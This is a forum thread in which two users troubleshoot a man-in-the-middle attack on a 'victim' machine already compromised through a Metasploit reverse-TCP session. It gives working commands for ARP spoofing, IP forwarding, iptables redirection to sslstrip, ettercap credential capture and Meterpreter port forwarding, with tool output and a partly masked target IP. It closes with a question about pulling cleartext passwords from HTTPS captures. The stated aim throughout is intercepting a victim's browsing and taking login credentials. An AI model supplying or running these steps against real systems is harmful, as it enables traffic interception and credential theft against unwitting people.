Reverse TCP, Ettercap, DNS Spoof

[ffix413]

Hello guys,
Here is my question.
I'm connected via a metersploit's payload (reverse tcp) to my victim's pc. Everything working well.
And i would to know if there's a way to capture internet datas from victim via the metasploit connection.
I mean, if i start ettercap and do a MITM between my attacker's pc and my victim's one, i'll only see the meterpreter datas sent, nothing with internet browsing etc (from victim)
So is something like this i can do with tcp reverse, or am i supposed to use another payload ?

Thanks for reading me

[Jimmy87]

How is your MITM attack setup, please show your method.

[ffix413]

Hello Jimmy87.

Here is the whole attack setup:


Here we can see that payload and meterpreter are connected:


So now what i'd like to do, is using the meterpreter's tunnel to run ettercap on the remote network.
Like if would have a tunneled local network (as Hamachi does), so i could see the victim and his gateway in ettercap hosts list.
Kinda like this :


Do you think it's possible to go through the meterpreter tunnel to do this, or have i to find another way ?

[Jimmy87]

So I think you should try this maybe,

edit etter.conf and uncomment the redir_command_off & redir_command_on within the linux section

Code:

kate /etc/etter.conf

Then enable IP forwarding;

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

Use arpspoof between the Victim and the Default gateway e.g.

Code:

arpspoof -i wlan0/eth0 (your interface) -t (192.168.1.11 - victim IP) (192.168.1.1 - Default GW IP)

You could then use IP tables to redirect some port 80 traffic if you wanted web traffic, the reason for the uncomment in step 1...e.g.

Code:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

You could then use sslstrip and ettercap (sslstrip to strip the ssl connection and ettercap to get UN and PW - if that's what you wanted)

Code:

sslstrip -a -k -f
ettercap -T -q -i (your interface)

After rereading the post, I'm wondering if you need to use this instead of arpspoof command. But I'm still not sure if this will work! (the above would be ok on the same LAN)

Code:

ettercap -T -M arp:remote

[ffix413]

I still can't see the victim's computer in Ettercap.

#Payload and meterpreter are connected

#Here is the part of my etter.conf :

Code:

#---------------
#     Linux 
#---------------

# if you use ipchains:
   redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT

#The ip_forward activation command didn't work

Code:

root@bt:~# cat /proc/sys/net/ipv4/ip_forward
0

So i edited: "/etc/sysctl.conf" and uncommented the following line :

Code:

# Uncomment the next line to enable packet forwarding for IPv4
#net.ipv4.ip_forward=1

And i entered your command back, which successfully worked this time.
So ipforward owes 1 now.

Your iptable commands were wrong (at least, it's what iptables told :l) i looked on the internet and entered this :

Code:

iptables -t nat -A PREROUTING --dst 192.168.1.11 -p tcp --dport 80 -j REDIRECT --to-ports 10000

And i've seen your edit, so i tried :

Code:

root@bt:~# ettercap -T -M arp:remote

ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA

Listening on eth0... (Ethernet)

  eth0 ->       08:00:27:0B:1E:04       192.168.1.6     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

etter.dns:1 Invalid ip address
etter.dns:2 Invalid ip address
etter.dns:3 Invalid ip address
  28 plugins
  40 protocol dissectors
  55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services


FATAL: ARP poisoning needs a non empty hosts list.

So itried to see my host list with "L" bind :
It's all blank.

Then i tried to see the profiles list with "O" bind, then "R" to see the remote_hosts :
No cillected Profile !!

So i tried the "S" bind to select a specific host :

Code:

==================================================

 1)     192.168.1.1   
 2)     192.168.1.2   
 3)     192.168.1.6   
Select an host to display (0 for all, -1 to quit): 0

I tried to capture anyway, but i got nothing, when i opened a web page with my victim's computer, nothing was showing up on ettercap (i ran it without quiet mode)

And btw, sslstrip is an unknown command via the console, i'll find how to start it on BT5 =)

Thanks for your help =) and tell me if i did something wrong

[Jimmy87]

Weird the ip_forward command works for me.

To get sslstrip running try;

Code:

cd /pentest/web/sslstrip
python setup.py install

I'm not really sure what else to suggest sorry, I can't get my head round how you'd be the man in the middle in this setup!

[ffix413]

Thanks for your help anyway!
I think i'm gonna learn more about meterpreter, because i've seen this recently :

It seems it supports port forwarding in itself, i'll search how to make it work

[Jimmy87]

Ok good luck with it, post back any findings!

[ffix413]

Ok, even with portfowarding i couldn't redirect packets going through victim's ports 80 & 443 through 43443 and 43444 of mine. (Ports open in my router btw). I've read multiple things about this, It seems that ppl only use it to make a Pivot. Anyway, here is the syntax, and the command in entered :

Code:

Syntax:
portfwd add –l 3389 –p 3389 –r < target host >

“add” will add the port forwarding to the list, and will essentially create a tunnel for us. Please note, this tunnel will also exist outside the Metasploit console. Making it available to any terminal session.
“-l 3389” is the local port that will be listening and forwarded to our target.
This can be any port on your machine, as long as it’s not already being used.

“-p 3389” is the destination port on our targeting host.

“-r <target host>” is the our targeted system’s IP or hostname.

According to this, i entered the following commands :

Code:

meterpreter > portfwd add -l 43443 -p 80 -r 37.160.50.174
[*] Local TCP relay created: 0.0.0.0:43443 <-> 37.160.***.***:80
meterpreter > portfwd add -l 43444 -p 443 -r 37.160.50.174
[*] Local TCP relay created: 0.0.0.0:43444 <-> 37.160.***.***:443

But still, when i'm capturing with wireshark, i only get datas from meterpreter, nothing about http packets from my victim.


I learn about how to sniff packets from the victim, with an extension called "sniffer", but if i save the pcap files, is there a way to get clear text password with them ? (if https is used)

[Jimmy87]

Yeah I think you're right, I did have a look at Metasploit Unleashed and read a bit about it, I'm guessing you read the same stuff;
http://www.offensive-security.com/me...ashed/Pivoting

I'm not sure if this can help you with your pcap request, take a look if you haven't already seen this;
http://segfault.in/2010/11/decrypt-h...-and-key-file/